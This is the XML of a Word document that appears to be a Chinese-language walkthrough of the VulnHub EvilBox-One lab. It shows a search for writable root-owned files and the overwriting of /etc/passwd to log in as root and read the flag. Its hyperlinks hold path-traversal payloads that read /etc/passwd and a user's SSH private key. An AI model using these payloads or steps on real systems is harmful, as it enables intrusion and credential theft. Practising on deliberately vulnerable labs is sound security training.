    <w:p w14:paraId="72AF2AC0" w14:textId="5A362045" w:rsidR="00F64CB4" w:rsidRDefault="00F64CB4" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="00F64CB4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6980CDE8" wp14:editId="5E6A8D58">
            <wp:extent cx="5274310" cy="521335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1581086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860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FE6A" w14:textId="2D7C779C" w:rsidR="00F64CB4" w:rsidRDefault="007E022C" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>想着去找漏洞但是没有找到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43823B" w14:textId="6985A986" w:rsidR="007E022C" w:rsidRDefault="007E022C" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能换方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B07859E" w14:textId="271BCAE3" w:rsidR="007E022C" w:rsidRDefault="007E022C" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="007E022C">
        <w:t>find / -user root -perm 2 &gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD60FB7" w14:textId="0D7E9586" w:rsidR="007E022C" w:rsidRDefault="007E022C" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个页面欸有找到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5746C" w14:textId="275FA7F5" w:rsidR="007E022C" w:rsidRDefault="007E022C" w:rsidP="005A1EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能去看看passwd有没有权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050EA124" w14:textId="4D0A2835" w:rsidR="007E022C" w:rsidRDefault="007E022C" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先生成一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密码（我用的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>himobrine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A65015D" w14:textId="2DDAD649" w:rsidR="007E022C" w:rsidRDefault="007E022C" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="007E022C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F5B7015" wp14:editId="31E7ACFF">
            <wp:extent cx="3048264" cy="838273"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="371274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747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8105" w14:textId="5CF6FE31" w:rsidR="007E022C" w:rsidRDefault="00124502" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改root密码进行登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E14400" w14:textId="5892B681" w:rsidR="00124502" w:rsidRDefault="00E31A9F" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="00E31A9F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F70509A" wp14:editId="130B18D8">
            <wp:extent cx="5274310" cy="3073400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1186039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9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DE21" w14:textId="73164888" w:rsidR="00E31A9F" w:rsidRDefault="00E31A9F" w:rsidP="005A1EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（登入之后才查看的密码，当时忘记截图了）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A4627" w14:textId="1C7758C5" w:rsidR="00E31A9F" w:rsidRDefault="00E31A9F" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="00E31A9F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29954460" wp14:editId="5E6CE34D">
            <wp:extent cx="3596952" cy="358171"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="289604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41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6DEC" w14:textId="0E7CB8F4" w:rsidR="00E31A9F" w:rsidRDefault="00E31A9F" w:rsidP="005A1EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77619D20" w14:textId="395406A6" w:rsidR="00E31A9F" w:rsidRDefault="00E31A9F" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="00E31A9F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="678FE2D2" wp14:editId="15FD8E4C">
            <wp:extent cx="3909399" cy="358171"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="31761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144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9B1" w14:textId="6E8BF437" w:rsidR="00E31A9F" w:rsidRDefault="00E31A9F" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AFE623" w14:textId="77777777" w:rsidR="00E31A9F" w:rsidRPr="00F64CB4" w:rsidRDefault="00E31A9F" w:rsidP="005A1EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E31A9F" w:rsidRPr="00F64C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6D3"/>
    <w:rsid w:val="0003761E"/>
    <w:rsid w:val="000C017D"/>
    <w:rsid w:val="00124502"/>
    <w:rsid w:val="0016573A"/>
    <w:rsid w:val="003E5D1A"/>
    <w:rsid w:val="004157AD"/>
    <w:rsid w:val="00430908"/>
    <w:rsid w:val="005A1EC1"/>
    <w:rsid w:val="005D2669"/>
    <w:rsid w:val="0071195F"/>
    <w:rsid w:val="007E022C"/>
    <w:rsid w:val="008B6381"/>
    <w:rsid w:val="008E09B9"/>
    <w:rsid w:val="00A736D3"/>
    <w:rsid w:val="00E31A9F"/>
    <w:rsid w:val="00F64CB4"/>
    <w:rsid w:val="00FF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68B20"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A4B02414-BA70-4498-A948-AE35CB77D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095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F095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64C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://192.168.21.153/secret/evil.php?FUZZ=../robots.txt%20-fs%200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192.168.21.153/secret/evil.php?command=/../../etc/passwd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hyperlink" Target="http://192.168.21.153/dvwa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hyperlink" Target="https://www.vulnhub.com/entry/evilbox-one,736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92.168.21.153/secret/evil.php?command=../../../../../../../../../home/mowree/.ssh/id_rsa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248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吴 泽巍</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-30T11:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-02T08:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>